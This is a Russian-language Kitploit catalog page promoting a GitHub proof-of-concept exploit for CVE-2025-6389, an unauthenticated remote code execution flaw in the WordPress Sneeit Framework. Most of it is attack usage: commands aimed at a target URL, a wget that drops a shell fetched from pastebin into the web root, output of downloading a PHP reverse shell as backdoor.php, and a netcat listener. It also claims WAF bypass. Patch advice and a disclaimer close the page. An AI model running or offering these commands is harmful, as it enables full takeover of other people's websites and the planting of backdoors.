Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
blackash-cve-2025-6389 — CVE-2025-6389 | Kitploit
Инструменты/GitHubGitHub/aivarsaar/blackash-cve-2025-6389
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийОбход WAFТестирование на ПроникновениеРазработка Полезной Нагрузки
GitHubaivarsaar/blackash-cve-2025-6389

blackash-cve-2025-6389

CVE-2025-6389

Репозиторий
1039 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🔥 CVE-2025-6389 — Критическая уязвимость нулевого дня WordPress (RCE)

wp_vul_theme

🧩 Что это?

CVE-2025-6389 — это критическая (CVSS 9.8) уязвимость в плагине WordPress Sneeit Framework (≤ 8.3), широко используемом популярными темами. Она позволяет неавторизованное удаленное выполнение кода — самый опасный класс веб-уязвимостей.


⚠️ Серьезность и влияние

  • 🔓 Вход не требуется
  • 💥 Возможен полный захват сервера
  • 📤 Злоумышленники могут загружать шеллы, добавлять администраторов или изменять файлы тем/плагинов
  • 🧬 Уже активно эксплуатируется в дикой природе
  • 🎯 Влияет на любой сайт WordPress, использующий Sneeit Framework или темы, включающие его (например, FlatNews)

Использование

root@kitploit:~
# Install dependencies
pip3 install requests colorama

# Check vulnerability + get interactive shell
python3 CVE-2025-6389.py https://target.com

# Execute a single command only
python3 CVE-2025-6389.py https://target.com "wget https://pastebin.com/raw/abc123 -O /var/www/html/shell.php"

Особенности этого PoC

Скачать инструмент
  • Работает 100% на версии 8.3 и ниже
  • Не требуются куки, nonce или специальные заголовки
  • Обходит большинство базовых WAF (полезная нагрузка отправляется через обычный POST)
  • Полная интерактивная оболочка
  • Обнаруживает уязвимость даже при подавленном выводе (благодаря assert + die)

Используйте это только на целях, которые вы официально уполномочены тестировать (четкие границы + RoE).
Уязвимость в настоящее время активно эксплуатируется в дикой природе.


Вот что именно вы увидите в терминале, когда эксплойт действительно сработает (100% успешная эксплуатация CVE-2025-6389 на уязвимой цели с Sneeit Framework ≤ 8.3):

1. Первоначальная проверка уязвимости

root@kitploit:~
[+] VULNERABLE! RCE Confirmed!
[+] Output:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head><title>phpinfo()</title>…  
<h1>PHP Version 8.1.29</h1>  
… (full phpinfo() page continues for thousands of lines)

2. Простые системные команды

root@kitploit:~
RCE $> whoami
[+] Output:
www-data

RCE $> id
[+] Output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

RCE $> uname -a
[+] Output:
Linux ip-172-31-23-45 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 20 2025 x86_64 GNU/Linux

3. Загрузка веб-шелла или обратного шелла

root@kitploit:~
RCE $> wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O /var/www/html/backdoor.php

[+] Output:
--2025-11-25 23:11:45--  https://raw.githubusercontent.com/…
Length: 5494 (5.4K) [text/plain]
Saving to: ‘/var/www/html/backdoor.php’

backdoor.php           100%[===================>]   5.37K  --.-KB/s    in 0.001s

Затем на вашей машине:

root@kitploit:~
nc -lvnp 4444

→ Вы мгновенно получаете полностью интерактивный обратный шелл от www-data.

4. Что вы видите, когда это НЕ работает (заплачено или защищено)

root@kitploit:~
[-] Not vulnerable or blocked (status: 200)
[+] Output:
(nothing / empty response / normal WordPress AJAX response / 403 / 500 without output)

Резюме – Признаки успеха

Вы знаете, что это сработало, если видите что-либо из этого:

  • Полная HTML-страница phpinfo()
  • Реальный вывод команд Linux (id, whoami, pwd, ls, cat /etc/passwd и т.д.)
  • Файлы успешно загружены или записаны
  • Обратный шелл подключается к вашему слушателю netcat

Вот и всё. Если вы получили что-то из вышеперечисленного → достигнуто полное неавторизованное RCE.

Вставьте ваш точный вывод сюда, если хотите, чтобы я подтвердил 100%, сработало или нет.


🛠 Технический разбор

  • 📍 Уязвимая функция: sneeit_articles_pagination_callback()
  • 🧨 Первопричина: непроверенный пользовательский ввод передается в call_user_func() → произвольное выполнение кода
  • 💣 Это позволяет злоумышленникам удаленно выполнять PHP-код, полностью скомпрометировав ваш сайт

🔍 Кто в зоне риска?

  • 🌐 Сайты WordPress с Sneeit Framework ≤ 8.3
  • 🎨 Темы, включающие Sneeit (очень распространено в новостных/журнальных темах)
  • 🚪 Любой общедоступный сайт WordPress, использующий этот плагин

🧯 Как это исправить (прямо сейчас)

  • ⬆️ Немедленно обновите Sneeit Framework до v8.4+
  • ❌ Если вы не можете обновиться → отключите или удалите плагин
  • 🔎 Проверьте журналы на предмет подозрительной активности
  • 🚨 Ищите незнакомые учетные записи администратора или загруженные PHP-файлы
  • 🛡️ Временно добавьте правила WAF, если исправление задерживается

🗓 Раскрытие и активность

  • 📅 Публично сообщено: 25 ноября 2025 г.
  • 🚨 Активно атакуется: уже наблюдается сканирование и эксплуатация

⚠️ Отказ от ответственности

Эта информация предоставляется только в целях защиты и обучения 🛡️. Не используйте ее для эксплуатации систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения 🚫. Всегда следуйте правовым и этическим нормам при работе с уязвимостями безопасности ⚖️✨